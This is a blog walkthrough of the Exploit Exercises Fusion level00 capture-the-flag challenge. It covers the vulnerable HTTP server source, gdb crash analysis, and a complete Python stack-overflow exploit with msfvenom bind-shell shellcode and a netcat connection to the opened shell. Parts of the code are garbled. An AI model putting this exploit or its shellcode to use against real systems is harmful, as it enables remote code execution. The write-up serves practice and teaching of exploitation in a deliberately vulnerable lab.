Skip to main content

Exploit Exercise Binary Exploitation Fusion level 00

Namaste Friends,

Welcome Again to Bitforestinfo Blog. Well, Today's Post is Really Going to be very Interesting Because Today I am going to share my walkthrough experience of Exploit Exercise Fusion level 00 Challenge.
So, Let's start.


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
 bad idea due to character restrictions due to realpath(). Instead, there is 
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"    

int fix_path(char *path)
  char resolved[128]
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);

char *parse_http_request()
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");


  printf("trying to access %s\n", path);

  return path;

int main(int argc, char **argv, char **envp)
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);


Source Code Description

After staring these codes for few minutes. My mind said that Its a server like program to process user provided http request. After execution of this program, it waits for new connection and after receiving a new connection.parse_http_request() routine gets active and In the end, fix_path() function. So, After Understand Program Behavoiur I started to search for Vulnerable codes and function.

Vulnerable codes

Set 1:[Not Sure]

path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;  <---- May Be For Another Methods???? 

SET 2  <---[ Completely Sure]

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved) 

Yes, Above code... Yes! These Codes  looks suspicious to me in first sight but To proceed further, first we need to conform vulnerability of these codes.  So,  After few testing procedures and gdb analysis, I conformed that the second set of code is vulnerable.

Function realpath() is a Vulnerable Function.

Testing Code

fusion@fusion:~$ cat try.c 
#include <stdio.h>
#include <string.h>

int main(){
 char resolve[150];

 if (realpath(" HTTP/1.1 aaaaaaaaaaa",resolve)==NULL){
  printf("Fail %s\n", resolve);
 return 0;


Analysis of above testing code is left over user to understand because this testing code is really very simple. You Just need to spend only few minutes to understand it completely.  Just run above codes. Hint : Buffer-overflow Vulnerability.

After few changes in testing codes I got below Error.

Gdb Output

Program received signal SIGSEGV, Segmentation fault.
0xcccccccc in ?? ()
(gdb) i r
eax            0x1 1
ecx            0xb7e568d0 -1209702192
edx            0xbffffa45 -1073743291
ebx            0xb7fceff4 -1208160268
esp            0xbffff8e0 0xbffff8e0
ebp            0xcccccccc 0xcccccccc
esi            0xbffffaf9 -1073743111
edi            0x8049f05 134520581
eip            0xcccccccc 0xcccccccc
eflags         0x10246 [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51


Now, I think its like a piece of cake to solve this challenge because we successfully detected vulnerability and All security features of these program is OFF. So, Here it's my Exploitation Codes.


# import modules
import socket
import struct
import os

# target configurations
TARGET_IP = raw_input("[*] Insert Machine Address [Default:] : ") or ''

# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Creating Socket ..."

# Socket File
sf = s.makefile('rb')

# Connect To Target

ebp ='[debug] buffer is at 0xbffff8f8 :-)\n'))
print ebp
ebp = ebp[ebp.find('0x'):-5] 

print "[+] Generating payload..."
payload = ''
payload+= 'GET '

# generated From Msfvenom
# msfvenom -p linux/x86/shell_bind_tcp
buf =  ""
buf += '\x90'*120            # NOP Sleds
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += "\xda\xcd\xb8\xbe\xd0\x1b\x82\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x14\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x5c"
buf += "\x25\x2a\x59\x57\x25\x1e\x1e\xc4\xc0\xa3\x29\x0b\xa4"
buf += "\xc2\xe4\x4b\x9e\x54\xa5\x23\x23\x69\x58\xef\x49\x79"
buf += "\x0b\x5f\x07\x98\xc1\x39\x4f\x96\x96\x4c\x2e\x2c\x24"
buf += "\x4a\x01\x4a\x87\xd2\x22\x23\x71\x1f\x24\xd0\x27\xf5"
buf += "\x1a\x8f\x1a\x89\x2c\x56\x5d\xe1\x81\x87\xee\x99\xb5"
buf += "\xf8\x72\x30\x28\x8e\x90\x92\xe7\x19\xb7\xa2\x03\xd7"
buf += "\xb8"
print "[+] Payload ready to dispatch."

# Trying To Find Offset
# 500 Words
# payload+= 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

# Offset 139
print "[+] Assemble Payload"
payload+= '\x90'*135        # Nop Sled
payload+= 'b'*4             #struct.pack("I", 0xbffff8f8) # struct.pack("I", int(ebp)) # EBP
payload+= struct.pack("I", 0xbffff8dc+10) # 'aaaa'                       # this point is countering
payload+= buf
                                       # Instruction Pointer ---|
payload+= '\x90'*(1000-(143+len(buf))) # Nop Sled           <---|
payload+= ' HTTP/1.1\r\n'

print "[+] Payload Sent"
# Sending Payload

print "[+] Wait For Response"
 print ['trying to access %s\n')+10)]
 print "[-] If You Are Reading This Message Then Probably Exploit failed."
 input("[-] Exit. Trying Again..")
 print "[+] Starting Bind TCP Shell."
 print "[+] Use Commands Carefully."
 os.system('nc {} 4444'.format(TARGET_IP))

Yeah! We Won.

Feel Free To Comment below Appreciable Points.. Hahaha!

Related Post

Top Visited

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

Create Simple Packet Sniffer Using Python

how to install burp suite in Linux/Ubuntu 16.04

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

Best 1000 User-agents List For Web Scraping

How To Install GDB Peda?

Latest Google Dorks List

2 Easiest Way To Enable Monitor Mode in Kali Linux | Airmon-ng | Iwconfig

How To Create Snake Game Using Python And Tkinter - Simple python games